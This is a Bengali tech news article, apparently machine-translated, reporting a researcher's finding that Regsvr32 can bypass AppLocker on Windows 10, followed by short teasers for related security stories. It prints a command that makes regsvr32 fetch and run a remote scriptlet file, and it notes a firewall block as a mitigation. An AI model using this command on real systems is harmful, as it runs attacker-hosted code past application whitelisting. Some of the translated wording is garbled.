উইন্ডোজ 10-এ অ্যাপলোকারকে বাইপাস করতে Regsvr32 ব্যবহার করা যেতে পারে

কলোরাডোর একজন গবেষক যিনি ক্যাসি স্মিথ নামে পরিচিত, তারা জানতে পেরেছেন যে উইন্ডোজ 10-এ অ্যাপলকারকে বাইপাস করতে ব্যবহার করতে পারবেন রেগসভিআর 32 এবং বিশেষত ব্যবসায়িক পরিবেশে কম্পিউটার ব্যবহারকারীদের ক্ষেত্রে এটি একটি বড় সমস্যা।

অ্যাপলকার প্রথম উইন্ডোজ 7 এবং উইন্ডোজ সার্ভার 2008 আর 2 এ চালু হয়েছিল। কোনও গ্রুপ বা ব্যবহারকারী ফাইলগুলির অনন্য পরিচয়ের উপর ভিত্তি করে কিছু বা সমস্ত অ্যাপ্লিকেশন গ্রহণ করতে পারে তা নির্দিষ্ট করার জন্য প্রশাসকদের অনুমতি দেওয়ার জন্য এটি ডিজাইন করা হয়েছে। আপনি যদি এমন কোনও ব্যক্তি হন যা অ্যাপলকার ব্যবহার করতে চান তবে সাধারণ অ্যাপ্লিকেশন হওয়া উচিত যে অ্যাপ্লিকেশনগুলিকে তাদের ট্র্যাকগুলিতে চালিত হতে বা থামাতে দেয় এমন কিছু বিধি তৈরি করতে এটি ব্যবহার করা যেতে পারে।

যারা অচেতন হতে পারে তাদের জন্য, Regvr32 ডিএলএলগুলি নিবন্ধন এবং নিবন্ধন করতে ব্যবহার করা যেতে পারে। এটি কোনও এক-ক্লিকের সরঞ্জাম নয় কারণ এটি একটি কমান্ড-লাইন ইউটিলিটি, তাই কেবলমাত্র উন্নত কম্পিউটার ব্যবহারকারীদের যা অফার করে তা কাজে লাগানোর চেষ্টা করা উচিত।

আমরা বুঝতে পারি যে এই কৌশলটি ব্যবহার করে, এটি কম্পিউটার সিস্টেমের রেজিস্ট্রিগুলিকে কোনও পরিবর্তন করে না, যা প্রশাসকদের পক্ষে কোনও পরিবর্তন হয়েছে কিনা তা জানতে অসুবিধা বোধ করে।

regsvr32 / s / n / u / i:http://server/file.sct scrobj.dll

"এখানে আশ্চর্যজনক বিষয়টি হ'ল Regsvr32 ইতিমধ্যে প্রক্সি সচেতন, টিএলএস ব্যবহার করে, পুনর্নির্দেশগুলি অনুসরণ করে ইত্যাদি … এবং … আপনি একটি স্বাক্ষরিত, ডিফল্ট এমএস বাইনারি অনুমান করেছেন। সুতরাং, আপনাকে যা করতে হবে তা হ'ল আপনার নিয়ন্ত্রণের একটি স্থানে আপনার এসসিটি ফাইলটি হোস্ট করা, "স্মিথ লিখেছিলেন।

উপরের কৌশলটিতে প্রশাসনিক সুযোগ-সুবিধার প্রয়োজন হয় না এবং এটি রেজিস্ট্রিতে কোনও পরিবর্তন করে না। তদ্ব্যতীত, স্ক্রিপ্টগুলি এইচটিটিপি বা এইচটিটিপিএস উভয়ের মাধ্যমে কল করা যেতে পারে। এই মুহুর্তে, মাইক্রোসফ্ট এই সামান্য সমস্যার জন্য একটি প্যাচ প্রকাশ করেছে না, সুতরাং এই মুহূর্তে একমাত্র বিকল্পটি উইন্ডোজ ফায়ারওয়ালের মাধ্যমে রেগসভ্র 32 কে ব্লক করা।

আকর্ষণীয়ভাবে যথেষ্ট, সফ্টওয়্যার জায়ান্টটি তার অপারেটিং সিস্টেমটির মুখোমুখি এই সুরক্ষা ইস্যুটির বিষয়ে এখনও সাড়া দেয়নি। এখন এটি উন্মুক্ত হয়ে গেছে, আমরা ভবিষ্যতের প্যাচের কথা বলার পাশাপাশি সংস্থার কাছ থেকে কিছু শুনতে পাব বলে আশা করি।

হ্যাকাররা pwn2own 2017 এর সময় ভিএমওয়্যার ওয়ার্কস্টেশন বাইপাস করতে প্রান্ত ব্যবহার করেছিল

হ্যাকিং ব্রাউজার এবং অপারেটিং সিস্টেমের তিন দিন পরে এই বছরের Pwn2Own প্রতিযোগিতাটি গুটিয়ে গেল। শেষে, ইভেন্টের সময় আক্রমণগুলি আটকাতে ব্যর্থ হওয়ার পরে মাইক্রোসফ্টের এজ ব্রাউজারটি হেরে উঠেছে। চাইনিজ সিকিউরিটি ফার্ম কিহু ৩ from০ এর একটি দল এজকে শোষণ করেছে এবং একটি ভিএমওয়্যার থেকে বাঁচতে দুটি সুরক্ষা ত্রুটির সাথে সংযুক্ত করেছে…

এই মাইক্রোসফ্ট ওয়ার্ড বাগটি আপনার অ্যান্টিমালওয়্যার সুরক্ষাটিকে বাইপাস করতে পারে

মাইক্রোসফ্ট অফিসকে প্রভাবিত করে এমন একটি জটিল ত্রুটি রয়েছে যা আক্ষরিকভাবে দূষিত কোডগুলিকে অ্যান্টিমালওয়্যার সলিউশন দ্বারা সনাক্ত করতে পারে না।

অ্যাক্টিভেশন ছাড়াই উইন্ডোজ 10 কতক্ষণ ব্যবহার করা যেতে পারে?

অ্যাক্টিভেশন ছাড়াই উইন্ডোজ 10 কতক্ষণ ব্যবহার করা যেতে পারে? উত্তর কার্যকরভাবে, নিষেধাজ্ঞাগুলি শুরু না হওয়া পর্যন্ত এক মাস। এটি সম্পর্কে এখানে আরও জানুন।